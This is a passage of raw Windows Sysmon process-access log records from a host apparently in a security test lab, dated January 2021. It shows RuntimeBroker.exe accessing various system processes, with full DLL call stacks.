ll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7D00-00000000A301}4172C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.367{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-8E6E-6005-7C00-00000000A301}4152C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0905-00000000A301}4240C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:34.351{59A5CD1D-93F9-6005-F104-00000000A301}45404264C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
